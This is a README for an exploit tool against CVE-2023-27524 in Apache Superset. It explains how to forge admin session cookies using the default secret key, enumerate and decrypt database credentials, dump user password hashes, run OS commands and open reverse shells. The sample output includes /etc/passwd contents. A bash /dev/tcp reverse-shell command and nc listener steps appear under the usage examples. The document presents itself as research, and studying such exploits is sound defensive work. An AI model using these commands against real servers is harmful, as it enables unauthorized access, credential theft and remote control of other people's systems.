# CVE-2023-27524: Apache Superset Auth Bypass and RCE
Apache Superset, a widely used open-source tool for data visualization and exploration, has been identified as having potential security weaknesses that could lead to authentication bypass and remote code execution (RCE). These vulnerabilities could empower malicious actors to acquire administrative privileges on the targeted servers, allowing them to gather user credentials and potentially compromise data.
The specific security issue in question is an insecure default configuration vulnerability referred to as CVE-2023-27524.
The root cause lies in the predictable Flask Secret Key set during installation, affecting a substantial number of exposed Apache Superset instances. While some mitigation efforts have been made, this vulnerability remains a critical concern for those who have not updated their configurations.
The issue can be escalated to RCE. This exploit adds this functionality to the [original one](https://github.com/horizon3ai/CVE-2023-27524).
<a href="https://nvd.nist.gov/vuln/detail/cve-2023-27524" target="_blank">Official</a> vulnerability description:
> Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
## Blog Post
This exploit script is written for a CVE analysis on [vsociety](https://www.vicarius.io/vsociety/).
## Usage
Install PIP packages:
```
pip3 install -r requirements.txt
```
Usage:
```
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
[--revshell REVSHELL] [--db-host]
options:
-h, --help show this help message and exit
--url URL, -u URL Host URL
--id ID User ID to forge session cookie for. Default=1
--wordlist WORDLIST, -w WORDLIST
Specify a wordlist file (default is 10.txt)
--validate, -v Validate the presence of vulnerability by login attempt
--enum-dbs, -dbs Enumerate databases
--enum-users, -eu Enumerate databases
--cmd CMD, -c CMD Run custom OS command on the database's server.
--revshell REVSHELL Specify IP:Port for reverse shell
--db-host Run commands or open reverse shell on the database server
```
## Examples
### Validate vulnerability and try to crack app secret with a custom wordlist
```
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt
[+] Session cookie found.
[+] Decoded session cookie: <REDACTED>
[+] Using '10k_most_common_passwords.txt' as a wordlist.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[+] Forged session cookie for user 1: <REDACTED>
[+] Superset Version: 2.0.1
[+] Login successful. Vulnerability is validated.
```
### Enumerate databases
```
# python3 exploit.py -u http://localhost:8088 --enum-dbs
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[+] Version 2.0.1 seems vulnerable.
[+] Enumerating databases via API...
[+] Found database: "examples" with password "superset".
[+] Found database: "SQLite".
[+] Enumerating database connection data and cracking password if possible...
+-----------------+---------------------------------------------------+--------------------------+----------------------+
| database_name | sqlalchemy_uri | password | decrypted_password |
|-----------------+---------------------------------------------------+--------------------------+----------------------|
| examples | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset******** |
| SQLite | sqlite+pysqlite:////app/superset_home/superset.db | | |
+-----------------+---------------------------------------------------+--------------------------+----------------------+
[+] Process of enumerating databases finished.
```
### Enumerate Superset users
```
# python3 exploit.py -u http://localhost:8088 --enum-users
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[+] Version 2.0.1 seems vulnerable.
[+] Checking existing metadata database connection...
[+] Settings of database with id 1 were successfully modified.
[+] Settings of database with id 2 were successfully modified.
[+] Superset metadata connection is already added with id 2.
[+] Trying to enumerate Superset users...
[+] RESULT:
+------------+--------------------------------------------------------------------------------------------------------+
| username | password |
|------------+--------------------------------------------------------------------------------------------------------|
| admin | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
+------------+--------------------------------------------------------------------------------------------------------+
```
### Run custom OS command
On Superset server:
```
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'
```
Note that in this case the output can't be viewed yet.
On DB server:
```
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[+] Version 2.0.1 seems vulnerable.
[+] Trying to run command on the database server...
[+] Settings of database with id 1 were successfully modified.
[+] $ cat /etc/passwd
+-----------------------------------------------------------------------------------+
| cmd_output |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| <REDACTED> |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash |
+-----------------------------------------------------------------------------------+
```
### Open a reverse shell
On Superset server:
```
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]
```
On DB server:
```
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
```
## Disclaimer
This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.
[4.0K] /data/pocs/26e05b42b0e2eda24cc1b56db2818c9d5a4e3402
├── [ 71K] 10k_most_common_passwords.txt
├── [ 26K] exploit.py
├── [8.3K] README.md
└── [ 105] requirements.txt
0 directories, 4 files